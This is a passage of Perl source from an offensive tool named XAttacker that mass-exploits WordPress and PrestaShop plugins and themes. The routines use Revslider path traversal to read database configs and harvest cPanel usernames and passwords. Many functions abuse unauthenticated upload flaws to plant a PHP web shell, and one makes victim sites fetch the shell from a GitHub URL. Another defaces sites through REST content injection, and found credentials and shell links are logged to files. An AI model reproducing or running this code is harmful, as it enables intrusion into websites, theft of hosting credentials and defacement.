  700. $resp = $ua->request(HTTP::Request->new(GET => $url ));
  701. $conttt = $resp->content;
  702. if($conttt =~ m/DB_NAME/g){
  703. print item(),"Revslider Get Config";
  704. print color('bold white')," .............. ";
  705. print color('bold green'),"VULN\n";
  706. open(save, '>>Result/Config.txt');
  707. print save "[RevsliderConfig] $url\n";
  708. close(save);
  709. getcpconfig();
  710. }else{
  711. print item(),"Revslider Get Config";
  712. print color('bold white')," .............. ";
  713. print color('bold red'),"NOt VULN\n";
  714. }
  715. }
  716.  
  717. sub getcpconfig{
  718. $ua = LWP::UserAgent->new(keep_alive => 1);
  719. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  720. $ua->timeout (10);
  721. $cpup = "wp-admin/admin-ajax.php?action=revslider_show_image&img=../../.my.cnf";
  722. $cpuplink = "$site/$cpup";
  723. $resp = $ua->request(HTTP::Request->new(GET => $cpuplink ));
  724. $cont = $resp->content;
  725. if($cont =~ m/user=/g){
  726. print item(),"Revslider Get cPanel";
  727. print color('bold white')," .............. ";
  728. print color('bold green'),"VULN\n";
  729.  
  730. $resp = $ua->request(HTTP::Request->new(GET => $cpuplink ));
  731. $contt = $resp->content;
  732. while($contt =~ m/user/g){
  733. if ($contt =~ /user=(.*)/){
  734.  
  735. print item(),"URL : $site/cpanel\n";
  736. print item(),"USER : $1\n";
  737. open (TEXT, '>>Result/cPanel.txt');
  738. print TEXT "Url : $site\n";
  739. print TEXT "USER : $1\n";
  740. close (TEXT);
  741. }
  742. if ($contt =~ /password="(.*)"/){
  743. print item(),"PASS : $1\n";
  744. open (TEXT, '>>Result/cPanel.txt');
  745. print TEXT "PASS : $1\n";
  746. close (TEXT);
  747. }
  748.  
  749.  
  750. }
  751. }else{
  752. print item(),"Revslider Get cPanel";
  753. print color('bold white')," .............. ";
  754. print color('bold red'),"NOt VULN\n";
  755. }
  756. }
  757.  
  758. ################ Showbiz #####################
  759. sub showbiz(){
  760. my $url = "$url/wp-admin/admin-ajax.php";
  761. sub randomagent {
  762. my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  763. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
  764. 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  765. 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
  766. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
  767. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
  768. );
  769. my $random = $array[rand @array];
  770. return($random);
  771. }
  772. my $useragent = randomagent();
  773.  
  774. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  775. $ua->timeout(10);
  776. $ua->agent($useragent);
  777. my $showbizres = $ua->post($url, Cookie => "", Content_Type => "form-data", Content => [action => "showbiz_ajax_action", client_action => "update_plugin", update_file => ["XAttacker.php"]]);
  778.  
  779. $showbizup = $site . '/wp-content/plugins/showbiz/temp/update_extract/XAttacker.php?X=Attacker';
  780.  
  781. my $checkshow = $ua->get("$showbizup")->content;
  782. if($checkshow =~ /X Attacker/){
  783. print item(),"Showbiz";
  784. print color('bold white')," ........................... ";
  785. print color('bold green'),"VULN\n";
  786. print item(),"Shell Uploaded Successfully\n";
  787. print color('bold white')," [Link] => $showbizup\n";
  788. open (TEXT, '>>Result/Shells.txt');
  789. print TEXT "$showbizup\n";
  790. close (TEXT);
  791. }else{
  792. print item(),"Showbiz";
  793. print color('bold white')," ........................... ";
  794. print color('bold red'),"NOt VULN\n";
  795. }
  796. }
  797.  
  798. ################ Simple Ads Manager #####################
  799. sub ads(){
  800. my $url = "$site/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php";
  801.  
  802. my $adsres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [uploadfile => ["XAttacker.php"], action => 'upload_ad_image', path => '',]);
  803. $adsup="$site/wp-content/plugins/simple-ads-manager/XAttacker.php?X=Attacker";
  804. if ($adsres->content =~ /{"status":"success"}/) {
  805. print item(),"Simple Ads Manager";
  806. print color('bold white')," ................ ";
  807. print color('bold green'),"VULN\n";
  808. print item(),"Shell Uploaded Successfully\n";
  809. print color('bold white')," [Link] => $adsup\n";
  810. open (TEXT, '>>Result/Shells.txt');
  811. print TEXT "$adsup\n";
  812. close (TEXT);
  813. }else{
  814. print item(),"Simple Ads Manager";
  815. print color('bold white')," ................ ";
  816. print color('bold red'),"NOt VULN\n";
  817. }
  818. }
  819.  
  820. ################ Slide Show Pro #####################
  821. sub slideshowpro(){
  822. my $url = "$site/wp-admin/admin.php?page=slideshowpro_manage";
  823.  
  824. my $slideshowres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["XAttacker.php"], task => 'pro_add_new_album', album_name => '', album_desc => '',]);
  825.  
  826. if ($slideshowres->content =~ /\/uploads\/slideshowpro\/(.*?)\/big\/XAttacker.php/) {
  827. $uploadfolder=$1;
  828. $sspup="$site/wp-content/uploads/slideshowpro/$uploadfolder/big/XAttacker.php?X=Attacker";
  829.  
  830. print item(),"Slide Show Pro";
  831. print color('bold white')," .................... ";
  832. print color('bold green'),"VULN\n";
  833. print item(),"Shell Uploaded Successfully\n";
  834. print color('bold white')," [Link] => $sspup\n";
  835. open (TEXT, '>>Result/Shells.txt');
  836. print TEXT "$sspup\n";
  837. close (TEXT);
  838. }else{
  839. print item(),"Slide Show Pro";
  840. print color('bold white')," .................... ";
  841. print color('bold red'),"NOt VULN\n";
  842. }
  843. }
  844.  
  845. ################################## WP Mobile Detector ########################################
  846. sub wpmobiledetector(){
  847. $wpmdshell = "https://raw.githubusercontent.com/Moham3dRiahi/XAttacker/master/XAttacker.php";
  848. $url = "$site/wp-content/plugins/wp-mobile-detector/resize.php?src=$wpmdshell";
  849. $wpmdup="$site/wp-content/plugins/wp-mobile-detector/cache/XAttacker.php?X=Attacker";
  850.  
  851. my $check = $ua->get("$url");
  852.  
  853. my $checkup = $ua->get("$wpmdup")->content;
  854. if($checkup =~/X Attacker/) {
  855. print item(),"WP Mobile Detector";
  856. print color('bold white')," ................ ";
  857. print color('bold green'),"VULN\n";
  858. print item(),"Shell Uploaded Successfully\n";
  859. print color('bold white')," [Link] => $wpmdup\n";
  860. open (TEXT, '>>Result/Shells.txt');
  861. print TEXT "$wpmdup\n";
  862. close (TEXT);
  863. }else{
  864. print item(),"WP Mobile Detector";
  865. print color('bold white')," ................ ";
  866. print color('bold red'),"NOt VULN\n";
  867. }
  868. }
  869.  
  870. ################ WYSIJA #####################
  871. sub wysija(){
  872. $theme = "my-theme";
  873. my $url = "$site/wp-admin/admin-post.php?page=wysija_campaigns&action=themes";
  874. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  875. $ua->timeout(10);
  876. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  877.  
  878. my $wysijares = $ua->post("$url", Content_Type => 'form-data', Content => [ $theme => ['XAttacker.zip', => 'XAttacker.zip'], overwriteexistingtheme => "on",action => "themeupload", submitter => "Upload",]);
  879. $wysijaup = "$site/wp-content/uploads/wysija/themes/XAttacker/XAttacker.php?X=Attacker";
  880. my $checkwysija = $ua->get("$wysijaup")->content;
  881. if($checkwysija =~/X Attacker/) {
  882. print item(),"Wysija";
  883. print color('bold white')," ............................ ";
  884. print color('bold green'),"VULN\n";
  885. print item(),"Shell Uploaded Successfully\n";
  886. print color('bold white')," [Link] => $wysijaup\n";
  887. open (TEXT, '>>Result/Shells.txt');
  888. print TEXT "$wysijaup\n";
  889. close (TEXT);
  890. }else{
  891. print item(),"Wysija";
  892. print color('bold white')," ............................ ";
  893. print color('bold red'),"NOt VULN\n";
  894. }
  895. }
  896.  
  897. ################ InBoundio Marketing #####################
  898. sub inboundiomarketing(){
  899. my $url = "$site/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php";
  900. $inbomarketingup = "$site/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/XAttacker.php?X=Attacker";
  901. my $inbomarketingres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [file => ["XAttacker.php"],]);
  902.  
  903. $checkinbomarketing = $ua->get("$inbomarketingup")->content;
  904. if($checkinbomarketing =~/X Attacker/) {
  905.  
  906. print item(),"InBoundio Marketing";
  907. print color('bold white')," ............... ";
  908. print color('bold green'),"VULN\n";
  909. print item(),"Shell Uploaded Successfully\n";
  910. print color('bold white')," [Link] => $inbomarketingup\n";
  911. open (TEXT, '>>Result/Shells.txt');
  912. print TEXT "$inbomarketingup\n";
  913. close (TEXT);
  914. }else{
  915. print item(),"InBoundio Marketing";
  916. print color('bold white')," ............... ";
  917. print color('bold red'),"NOt VULN\n";
  918. }
  919. }
  920.  
  921. ################ dzs-zoomsounds #####################
  922. sub dzszoomsounds(){
  923. my $url = "$site/wp-content/plugins/dzs-zoomsounds/admin/upload.php";
  924. $dzsup = "$site/wp-content/plugins/dzs-zoomsounds/admin/upload/XAttacker.php?X=Attacker";
  925. my $dzsres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [file_field => ["XAttacker.php"],]);
  926.  
  927. $checkdzsup = $ua->get("$dzsup")->content;
  928. if($checkdzsup =~/X Attacker/) {
  929.  
  930. print item(),"dzs-zoomsounds";
  931. print color('bold white')," .................... ";
  932. print color('bold green'),"VULN\n";
  933. print item(),"Shell Uploaded Successfully\n";
  934. print color('bold white')," [Link] => $dzsup\n";
  935. open (TEXT, '>>Result/Shells.txt');
  936. print TEXT "$dzsup\n";
  937. close (TEXT);
  938. }else{
  939. print item(),"dzs-zoomsounds";
  940. print color('bold white')," .................... ";
  941. print color('bold red'),"NOt VULN\n";
  942. }
  943. }
  944.  
  945. ################ reflex-gallery #####################/
  946. sub reflexgallery(){
  947. my $url = "$site/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=$year&Month=$month";
  948. $reflexup = "$site/wp-content/uploads/$year/$month/XAttacker.php?X=Attacker";
  949. my $reflexres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [qqfile => ["XAttacker.php"],]);
  950.  
  951. $checkreflexup = $ua->get("$reflexup")->content;
  952. if($checkreflexup =~/X Attacker/) {
  953. print item(),"Reflex Gallery";
  954. print color('bold white')," .................... ";
  955. print color('bold green'),"VULN\n";
  956. print item(),"Shell Uploaded Successfully\n";
  957. print color('bold white')," [Link] => $reflexup\n";
  958. open (TEXT, '>>Result/Shells.txt');
  959. print TEXT "$reflexup\n";
  960. close (TEXT);
  961. }else{
  962. print item(),"Reflex Gallery";
  963. print color('bold white')," .................... ";
  964. print color('bold red'),"NOt VULN\n";
  965. }
  966. }
  967.  
  968. ################ Creative Contact Form #####################
  969. sub sexycontactform(){
  970. my $url = "$site/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php";
  971. $sexycontactup = "$site/wp-content/plugins/sexy-contact-form/includes/fileupload/files/XAttacker.php?X=Attacker";
  972. my $field_name = "files[]";
  973.  
  974. my $sexycontactres = $ua->post( $url,
  975. Content_Type => 'form-data',
  976. Content => [ $field_name => ["XAttacker.php"] ]
  977. );
  978.  
  979. $checksexycontactup = $ua->get("$sexycontactup")->content;
  980. if($checksexycontactup =~/X Attacker/) {
  981. print item(),"Creative Contact Form";
  982. print color('bold white')," ............. ";
  983. print color('bold green'),"VULN\n";
  984. print item(),"Shell Uploaded Successfully\n";
  985. print color('bold white')," [Link] => $sexycontactup\n";
  986. open (TEXT, '>>Result/Shells.txt');
  987. print TEXT "$sexycontactup\n";
  988. close (TEXT);
  989. }else{
  990. print item(),"Creative Contact Form";
  991. print color('bold white')," ............. ";
  992. print color('bold red'),"NOt VULN\n";
  993. }
  994. }
  995.  
  996. ################ Work The Flow File Upload #####################
  997. sub wtffu(){
  998. my $url = "$site/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/";
  999. my $shell ="XAttacker.php";
  1000. my $field_name = "files[]";
  1001.  
  1002. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  1003. $wtffup="$site/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/XAttacker.php?X=Attacker";
  1004.  
  1005. $checkwtffup = $ua->get("$wtffup")->content;
  1006. if($checkwtffup =~/X Attacker/) {
  1007. print item(),"Work The Flow File Upload";
  1008. print color('bold white')," ......... ";
  1009. print color('bold green'),"VULN\n";
  1010. print item(),"Shell Uploaded Successfully\n";
  1011. print color('bold white')," [Link] => $wtffup\n";
  1012. open (TEXT, '>>Result/Shells.txt');
  1013. print TEXT "$wtffup\n";
  1014. close (TEXT);
  1015. }else{
  1016. print item(),"Work The Flow File Upload";
  1017. print color('bold white')," ......... ";
  1018. print color('bold red'),"NOt VULN\n";
  1019. }
  1020. }
  1021.  
  1022. ################ WP Job Manger #####################
  1023. sub wpjm(){
  1024. my $url = "$site/jm-ajax/upload_file/";
  1025. my $image ="XAttacker.php";
  1026. my $field_name = "file[]";
  1027.  
  1028. my $response = $ua->post( $url,
  1029. Content_Type => 'form-data',
  1030. Content => [ $field_name => ["$image"] ]
  1031. );
  1032.  
  1033. $jobmangerup = "$site/wp-content/uploads/job-manager-uploads/file/$year/$month/XAttacker.gif";
  1034. $checkpofwup = $ua->get("$jobmangerup")->content_type;
  1035. if($checkpofwup =~/image\/gif/) {
  1036. print item(),"WP Job Manger";
  1037. print color('bold white')," ..................... ";
  1038. print color('bold green'),"VULN\n";
  1039. print item(),"Picture Uploaded Successfully\n";
  1040. print color('bold white')," [Link] => $jobmangerup\n";
  1041. print color('bold green')," [";
  1042. print color('bold red'),"-";
  1043. print color('bold green'),"] ";
  1044. open (TEXT, '>>Result/Index.txt');
  1045. print TEXT "$jobmangerup\n";
  1046. close (TEXT);
  1047. }else{
  1048. print item(),"WP Job Manger";
  1049. print color('bold white')," ..................... ";
  1050. print color('bold red'),"NOt VULN\n";
  1051. }
  1052. }
  1053.  
  1054. ################ PHP Event Calendar #####################
  1055. sub phpeventcalendar(){
  1056. my $url = "$site/wp-content/plugins/php-event-calendar/server/file-uploader/";
  1057. my $shell ="XAttacker.php";
  1058. my $field_name = "files[]";
  1059.  
  1060. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  1061. $phpevup="$site/wp-content/plugins/php-event-calendar/server/file-uploader/XAttacker.php?X=Attacker";
  1062.  
  1063. if ($response->content =~ /{"files/) {
  1064. print item(),"PHP Event Calendar";
  1065. print color('bold white')," ................ ";
  1066. print color('bold green'),"VULN\n";
  1067. print item(),"Shell Uploaded Successfully\n";
  1068. print color('bold white')," [Link] => $phpevup\n";
  1069. open (TEXT, '>>Result/Shells.txt');
  1070. print TEXT "$phpevup\n";
  1071. close (TEXT);
  1072. }else{
  1073. print item(),"PHP Event Calendar";
  1074. print color('bold white')," ................ ";
  1075. print color('bold red'),"NOt VULN\n";
  1076. }
  1077. }
  1078.  
  1079. ################ Synoptic #####################
  1080. sub synoptic(){
  1081. my $url = "$site/wp-content/themes/synoptic/lib/avatarupload/upload.php";
  1082. my $shell ="XAttacker.php";
  1083. my $field_name = "qqfile";
  1084.  
  1085. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  1086. $Synopticup="$site/wp-content/uploads/markets/avatars/XAttacker.php?X=Attacker";
  1087.  
  1088. $checkSynopticup = $ua->get("$Synopticup")->content;
  1089. if($checkSynopticup =~/X Attacker/) {
  1090. print item(),"Synoptic";
  1091. print color('bold white')," .......................... ";
  1092. print color('bold green'),"VULN\n";
  1093. print item(),"Shell Uploaded Successfully\n";
  1094. print color('bold white')," [Link] => $Synopticup\n";
  1095. open (TEXT, '>>Result/Shells.txt');
  1096. print TEXT "$Synopticup\n";
  1097. close (TEXT);
  1098. }else{
  1099. print item(),"Synoptic";
  1100. print color('bold white')," .......................... ";
  1101. print color('bold red'),"NOt VULN\n";
  1102. }
  1103. }
  1104.  
  1105. ################ Wpshop #####################
  1106. sub Wpshop(){
  1107. my $url = "$site/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload";
  1108. my $shell ="XAttacker.php";
  1109. my $field_name = "wpshop_file";
  1110.  
  1111. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  1112. $wpshopup="$site/wp-content/uploads/XAttacker.php?X=Attacker";
  1113.  
  1114. $checkwpshopup = $ua->get("$wpshopup")->content;
  1115. if($checkwpshopup =~/X Attacker/) {
  1116.  
  1117. print item(),"Wp Shop";
  1118. print color('bold white')," ........................... ";
  1119. print color('bold green'),"VULN\n";
  1120. print item(),"Shell Uploaded Successfully\n";
  1121. print color('bold white')," [Link] => $wpshopup\n";
  1122. open (TEXT, '>>Result/Shells.txt');
  1123. print TEXT "$wpshopup\n";
  1124. close (TEXT);
  1125. }else{
  1126. print item(),"Wp Shop";
  1127. print color('bold white')," ........................... ";
  1128. print color('bold red'),"NOt VULN\n";
  1129. }
  1130. }
  1131.  
  1132. # this exploit Content Injection coded by fallag gassrini <3
  1133. ################ Content Injection #####################
  1134. sub wpinjection(){
  1135. $linkposts = $site . 'index.php/wp-json/wp/v2/posts/';
  1136.  
  1137. $sorm = $ua->get($linkposts);
  1138. $karza = $sorm->content;
  1139. if($karza =~/\/?p=(.*?)\"\}/)
  1140. {
  1141. $id=$1;
  1142.  
  1143. $ajx = $site . '/wp-json/wp/v2/posts/'.$id;
  1144.  
  1145. $sirina=$id . 'justrawdata';
  1146. $index='<p align="center"><img border="0" src="http://vignette4.wikia.nocookie.net/trollpasta/images/3/34/Fuck-you-cartoon-meme.gif" width="339" height="476"></p><pre>&nbsp;</pre><div align="center"><p align="center" class="auto-style2">
  1147. <font face="Bradley Hand ITC" size="6">HaCkEd By Mohamed Riahi</font></p>
  1148. <p align="center" class="auto-style2">';
  1149. $gassface = POST $ajx, [
  1150. 'id' => $sirina, 'slug' => '/m.htm', 'title' => 'HaCkEd By Mohamed Riahi ', 'content' => $index];
  1151. $response = $ua->request($gassface);
  1152. $stat = $response->content;
  1153. if ($stat =~ /HaCkEd/){
  1154. $urljson = "$site/m.htm";
  1155. $link = $ua->get($site);
  1156. $link = $link->request->uri;
  1157. print item(),"Content Injection";
  1158. print color('bold white')," ................. ";
  1159. print color('bold green'),"VULN\n";
  1160. print item(),"Injected Successfully\n";
  1161. print color('bold white')," [Link] => $urljson\n\n";
  1162. open (TEXT, '>>Result/Index.txt');
  1163. print TEXT "$urljson\n";
  1164. close (TEXT);
  1165. }else{
  1166. print item(),"Content Injection";
  1167. print color('bold white')," ................. ";
  1168. print color('bold red'),"NOt VULN\n\n";
  1169. }
  1170. }
  1171. }
  1172.  
  1173. ################ cubed #####################
  1174. sub cubed(){
  1175. my $cubedurl = "$site/wp-content/themes/cubed_v1.2/functions/upload-handler.php";
  1176. my $response = $ua->post($cubedurl, Content_Type => 'multipart/form-data', Content => [uploadfile => ["XAttacker.php"]]);
  1177. $cubedup="$site/wp-content/uploads/$year/$month/XAttacker.php?X=Attacker";
  1178. my $checkcubed = $ua->get("$cubedup")->content;
  1179.  
  1180. if($checkcubed =~/X Attacker/) {
  1181. print item(),"Cubed";
  1182. print color('bold white')," ............................. ";
  1183. print color('bold green'),"VULN\n";
  1184. print item(),"Shell Uploaded Successfully\n";
  1185. print color('bold white')," [Link] => $cubedup\n";
  1186. open (TEXT, '>>Result/Shells.txt');
  1187. print TEXT "$cubedup\n";
  1188. close (TEXT);
  1189. }else{
  1190. print item(),"Cubed";
  1191. print color('bold white')," ............................. ";
  1192. print color('bold red'),"NOt VULN\n";
  1193. }
  1194. }
  1195.  
  1196. ################ RightNow #####################
  1197. sub RightNow(){
  1198. my $RightNowurl = "$site/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php";
  1199. my $response = $ua->post($RightNowurl, Content_Type => 'multipart/form-data', Content => [Filedata => ["XAttacker.php"]]);
  1200. $RightNowup="$site/wp-content/uploads/settingsimages/XAttacker.php?X=Attacker";
  1201. my $checkRightNow = $ua->get("$RightNowup")->content;
  1202.  
  1203. if($checkRightNow =~/X Attacker/) {
  1204. print item(),"Rightnow Theme";
  1205. print color('bold white')," .................... ";
  1206. print color('bold white'),"";
  1207. print color('bold green'),"VULN";
  1208. print color('bold white'),"\n";
  1209. print item(),"Shell Uploaded Successfully\n";
  1210. print color('bold white')," [Link] => $RightNowup\n";
  1211. open (TEXT, '>>Result/Shells.txt');
  1212. print TEXT "$RightNowup\n";
  1213. close (TEXT);
  1214. }else{
  1215. print item(),"Rightnow Theme";
  1216. print color('bold white')," .................... ";
  1217. print color('bold red'),"NOt VULN\n";
  1218. }
  1219. }
  1220.  
  1221. ################ konzept #####################
  1222. sub konzept(){
  1223. my $url = "$site/wp-content/themes/konzept/includes/uploadify/upload.php";
  1224. my $response = $ua->post($url, Content_Type => "form-data", Content => [file => ["XAttacker.jpg"], name => "XAttacker.php"]);
  1225.  
  1226. $up="$site/wp-content/themes/konzept/includes/uploadify/uploads/XAttacker.php?X=Attacker";
  1227.  
  1228. $checkup = $ua->get("$up")->content;
  1229. if($checkup =~/X Attacker/) {
  1230. print item(),"Konzept";
  1231. print color('bold white')," ........................... ";
  1232. print color('bold green'),"VULN\n";
  1233. print item(),"Shell Uploaded Successfully\n";
  1234. print color('bold white')," [Link] => $up\n";
  1235. open (TEXT, '>>Result/Shells.txt');
  1236. print TEXT "$up\n";
  1237. close (TEXT);
  1238. }else{
  1239. print item(),"Konzept";
  1240. print color('bold white')," ........................... ";
  1241. print color('bold red'),"NOt VULN\n";
  1242. }
  1243. }
  1244.  
  1245. ################ omni-secure-files #####################
  1246. sub omnisecurefiles(){
  1247. my $url = "$site/wp-content/plugins/omni-secure-files/plupload/examples/upload.php";
  1248. my $response = $ua->post($url, Content_Type => "form-data", Content => [file => ["XAttacker.php"], name => "XAttacker.php"]);
  1249.  
  1250. $up="$site/wp-content/plugins/omni-secure-files/plupload/examples/uploads/XAttacker.php?X=Attacker";
  1251.  
  1252. $checkup = $ua->get("$up")->content;
  1253. if($checkup =~/X Attacker/) {
  1254. print item(),"Omni Secure Files";
  1255. print color('bold white')," ................. ";
  1256. print color('bold green'),"VULN\n";
  1257. print item(),"Shell Uploaded Successfully\n";
  1258. print color('bold white')," [Link] => $up\n";
  1259. open (TEXT, '>>Result/Shells.txt');
  1260. print TEXT "$up\n";
  1261. close (TEXT);
  1262. }else{
  1263. print item(),"Omni Secure Files";
  1264. print color('bold white')," ................. ";
  1265. print color('bold red'),"NOt VULN\n";
  1266. }
  1267. }
  1268.  
  1269. ################ pitchprint #####################
  1270. sub pitchprint(){
  1271. my $url = "$site/wp-content/plugins/pitchprint/uploader/";
  1272. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => ['files[]' => ["XAttacker.php"]]);
  1273. $up="$site/wp-content/plugins/pitchprint/uploader/files/XAttacker.php?X=Attacker";
  1274. my $check = $ua->get("$up")->content;
  1275.  
  1276. if($check =~/X Attacker/) {
  1277. print item(),"Pitchprint";
  1278. print color('bold white')," ........................ ";
  1279. print color('bold white'),"";
  1280. print color('bold green'),"VULN";
  1281. print color('bold white'),"\n";
  1282. print item(),"Shell Uploaded Successfully\n";
  1283. print color('bold white')," [Link] => $up\n";
  1284. open (TEXT, '>>Result/Shells.txt');
  1285. print TEXT "$up\n";
  1286. close (TEXT);
  1287. }else{
  1288. print item(),"Pitchprint";
  1289. print color('bold white')," ........................ ";
  1290. print color('bold red'),"NOt VULN\n";}
  1291. }
  1292.  
  1293. ################ satoshi #####################
  1294. sub satoshi(){
  1295. my $url = "$site/wp-content/themes/satoshi/upload-file.php";
  1296. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [uploadfile => ["XAttacker.php"]]);
  1297. $up="$site/wp-content/satoshi/images/XAttacker.php?X=Attacker";
  1298. my $check = $ua->get("$up")->content;
  1299.  
  1300. if($check =~/X Attacker/) {
  1301. print item(),"Satoshi";
  1302. print color('bold white')," ........................... ";
  1303. print color('bold white'),"";
  1304. print color('bold green'),"VULN";
  1305. print color('bold white'),"\n";
  1306. print item(),"Shell Uploaded Successfully\n";
  1307. print color('bold white')," [Link] => $up\n";
  1308. open (TEXT, '>>Result/Shells.txt');
  1309. print TEXT "$up\n";
  1310. close (TEXT);
  1311. }else{
  1312. print item(),"Satoshi";
  1313. print color('bold white')," ........................... ";
  1314. print color('bold red'),"NOt VULN\n";}
  1315. }
  1316.  
  1317. ################ pinboart #####################
  1318. sub pinboard(){
  1319. my $url = "$site/wp-content/themes/pinboard/themify/themify-ajax.php?upload=1";
  1320. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [Filedata => ["XAttacker.php"]]);
  1321. $up="$site/wp-content/themes/pinboard/uploads/XAttacker.php?X=Attacker";
  1322. my $check = $ua->get("$up")->content;
  1323.  
  1324. if($check =~/X Attacker/) {
  1325. print item(),"Pinboard";
  1326. print color('bold white')," .......................... ";
  1327. print color('bold white'),"";
  1328. print color('bold green'),"VULN";
  1329. print color('bold white'),"\n";
  1330. print item(),"Shell Uploaded Successfully\n";
  1331. print color('bold white')," [Link] => $up\n";
  1332. open (TEXT, '>>Result/Shells.txt');
  1333. print TEXT "$up\n";
  1334. close (TEXT);
  1335. }else{
  1336. print item(),"Pinboard";
  1337. print color('bold white')," .......................... ";
  1338. print color('bold red'),"NOt VULN\n";
  1339. }
  1340. }
  1341.  
  1342. ################ barclaycart #####################
  1343. sub barclaycart(){
  1344. my $url = "$site/wp-content/plugins/barclaycart/uploadify/uploadify.php";
  1345. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [Filedata => ["XAttacker.php"]]);
  1346. $up="$site/wp-content/plugins/barclaycart/uploadify/XAttacker.php?X=Attacker";
  1347. my $check = $ua->get("$up")->content;
  1348.  
  1349. if($check =~/X Attacker/) {
  1350. print item(),"Barclaycart";
  1351. print color('bold white')," ....................... ";
  1352. print color('bold white'),"";
  1353. print color('bold green'),"VULN";
  1354. print color('bold white'),"\n";
  1355. print item(),"Shell Uploaded Successfully\n";
  1356. print color('bold white')," [Link] => $up\n";
  1357. open (TEXT, '>>Result/Shells.txt');
  1358. print TEXT "$up\n";
  1359. close (TEXT);
  1360. }else{
  1361. print item(),"Barclaycart";
  1362. print color('bold white')," ....................... ";
  1363. print color('bold red'),"NOt VULN\n";}
  1364. }
  1365.  
  1366. ######################################################
  1367. #################### PrestaShoP ######################
  1368. ######################################################
  1369.  
  1370. ################ columnadverts #####################
  1371. sub columnadverts(){
  1372. my $url = "$site/modules/columnadverts/uploadimage.php";
  1373. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
  1374.  
  1375. $columnadvertsup="$site/modules/columnadverts/slides/XAttacker.php?X=Attacker";
  1376.  
  1377. my $checkcolumnadverts = $ua->get("$columnadvertsup")->content;
  1378. if($checkcolumnadverts =~/X Attacker/) {
  1379.  
  1380. print item(),"columnadverts";
  1381. print color('bold white')," ..................... ";
  1382. print color('bold green'),"VULN\n";
  1383. print item(),"Shell Uploaded Successfully\n";
  1384. print color('bold white')," [Link] => $columnadvertsup\n";
  1385. open (TEXT, '>>Result/Shells.txt');
  1386. print TEXT "$columnadvertsup\n";
  1387. close (TEXT);
  1388. }else{
  1389. print item(),"columnadverts";
  1390. print color('bold white')," ..................... ";
  1391. print color('bold red'),"NOt VULN\n";
  1392. }
  1393. }
  1394.  
  1395.  
  1396. ################ soopamobile #####################
  1397. sub soopamobile(){
  1398. my $url = "$site/modules/soopamobile/uploadimage.php";
  1399. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
  1400.  
  1401. $soopamobileup="$site/modules/soopamobile/slides/XAttacker.php?X=Attacker";
  1402.  
  1403. my $checksoopamobile = $ua->get("$soopamobileup")->content;
  1404. if($checksoopamobile =~/X Attacker/) {
  1405. print item(),"soopamobile";
  1406. print color('bold white')," ....................... ";
  1407. print color('bold green'),"VULN\n";
  1408. print item(),"Shell Uploaded Successfully\n";
  1409. print color('bold white')," [Link] => $soopamobileup\n";
  1410. open (TEXT, '>>Result/Shells.txt');
  1411. print TEXT "$soopamobileup\n";
  1412. close (TEXT);
  1413. }else{
  1414. print item(),"soopamobile";
  1415. print color('bold white')," ....................... ";
  1416. print color('bold red'),"NOt VULN\n";
  1417. }
  1418. }
  1419.  
  1420. ################ soopabanners #####################
  1421. sub soopabanners(){
  1422. my $url = "$site/modules/soopabanners/uploadimage.php";
  1423. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
  1424.  
  1425. $soopabannersup="$site/modules/soopabanners/slides/XAttacker.php?X=Attacker";
  1426.  
  1427. my $checksoopabanners = $ua->get("$soopabannersup")->content;
  1428. if($checksoopabanners =~/X Attacker/) {
  1429.  
  1430. print item(),"soopabanners";
  1431. print color('bold white')," ...................... ";
  1432. print color('bold green'),"VULN\n";
  1433. print item(),"Shell Uploaded Successfully\n";
  1434. print color('bold white')," [Link] => $soopabannersup\n";
  1435. open (TEXT, '>>Result/Shells.txt');
  1436. print TEXT "$soopabannersup\n";
  1437. close (TEXT);
  1438. }else{
  1439. print item(),"soopabanners";
  1440. print color('bold white')," ...................... ";
  1441. print color('bold red'),"NOt VULN\n";
